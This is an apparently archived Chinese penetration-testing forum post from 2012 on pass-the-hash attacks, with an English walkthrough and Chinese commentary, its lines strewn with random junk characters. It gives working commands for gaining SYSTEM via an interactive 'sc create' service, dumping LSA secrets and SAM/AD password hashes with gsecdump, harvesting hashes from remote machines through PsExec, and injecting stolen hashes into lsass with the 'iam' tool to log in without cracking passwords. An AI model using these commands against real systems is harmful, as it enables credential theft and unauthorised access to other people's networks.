中国网络渗透测试联盟

标题: HASH注入式攻击 [打印本页]
作者: admin    时间: 2012-11-6 21:09
标题: HASH注入式攻击
o get a DOS Prompt as NT system:
! t. i9 z, e! t0 C& W1 ?. m# j0 g/ I  S! v( k
C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact1 s) F2 i1 T- ^* T) X
[SC] CreateService SUCCESS
, ^3 r+ [1 @( \. r( u  O- q
, ^6 y/ V' i: `' ?+ \; w1 VC:\>sc start shellcmdline' n. o8 q& H9 ]+ Q! l: j
[SC] StartService FAILED 1053:5 i4 r  a" f/ w0 ~; Y5 n
: s9 i$ `: `" l' v: B
The service did not respond to the start or control request in a timely fashion.
. J. q4 x6 @; J
; ^% K# A" y  K! @7 l5 {C:\>sc delete shellcmdline) H1 o4 G+ x, r% _8 b) S
[SC] DeleteService SUCCESS
1 {8 z5 f8 I3 G2 B- n0 Y$ J& A* N% X- r6 c9 b( O
------------
4 z/ P% g+ `* z6 {' ~6 g$ [1 q% I, c8 q/ r+ x0 j) |
Then in the new DOS window:- {# M& @' @( ^4 f! X7 p

6 ?8 U6 k$ N( R- h5 O4 lMicrosoft Windows XP [Version 5.1.2600]
/ _3 P8 \& G0 N& u% F(C) Copyright 1985-2001 Microsoft Corp.6 u9 T- G' V: D5 j- X! I/ W

. ~2 T! M; p9 @( m' J9 N* XC:\WINDOWS\system32>whoami
7 l9 W# t- e: D+ U1 S0 m4 C( CNT AUTHORITY\SYSTEM/ d/ s; _% e! R

, L- K9 \# a- N0 X3 D6 K7 XC:\WINDOWS\system32>gsecdump -h* `; g$ ^- p5 v0 l
gsecdump v0.6 by Johannes Gumbel (链接标记johannes.gumbel@truesec.se)
% ]% w: A  [6 \7 J. |- gusage: gsecdump [options]
: N$ @9 p, z. l% Y4 ], \! y2 Y  @8 V% @4 B4 g+ p
options:( B7 Z3 b* t4 H
-h [ --help ] show help
$ ^( E* }$ V% K; i/ _-a [ --dump_all ] dump all secrets8 s+ w) u* F) a
-l [ --dump_lsa ] dump lsa secrets
3 F4 n+ M5 T9 \% Z' j-w [ --dump_wireless ] dump microsoft wireless connections
  a8 k3 m, f7 w" G( s-u [ --dump_usedhashes ] dump hashes from active logon sessions
7 K5 n' N  f2 a8 G+ n( P-s [ --dump_hashes ] dump hashes from SAM/AD. @0 L/ ]$ L7 E0 h) l

" {2 S) o0 p3 jAlthough I like to use:( F/ B$ h# t7 }1 j: e

0 Y6 h7 L" }5 r7 nPsExec v1.83 - Execute processes remotely
9 i9 _" O3 m6 e, F. JCopyright (C) 2001-2007 Mark Russinovich) a* s* t$ u, s- V# h4 {
Sysinternals - 链接标记[url]www.sysinternals.com[/url]
8 M9 _7 ]4 F6 M% _" r: Z/ B
8 ~' u( U5 w# U+ ~2 oC:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT+ D2 f* n; `7 o

  m2 O5 _2 S; W+ N2 f- {* Oto get the hashes from active logon sessions of a remote system.
$ q% ?1 }, A' d" |$ y8 K. z, z9 s' B- i  k  p! A: q8 [# p) j( w" d! }! B* d
These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.
. c' ?; e" I; u- `% i$ M) g) l: ?- r) m' ?
提示一下,可以使用pshtools工具包中的iam,把刚才使用gsecdump抓取出来HASH信息导入本地的lsass进程,来实现hash注入式攻击,还是老外厉害,这下管理员有得忙了,ARP欺骗的时候获得的LM/NThash,还有gethash获得的,其实根本不用破解密码,这个就是利用工具了,原文说的好,不管密码是设置4位还是127位,只要有了hash,100%就能搞定了.
. E+ e7 q  A8 z原文出处:链接标记[url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]; F# i( H3 `7 n5 r# n' e
$ t* |! S+ [7 L. e9 w# a. p/ g- {
我看了下原文出处,貌似是/2007/03/16/郁闷啊,差距。3 w  I" [1 O! W/ i




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2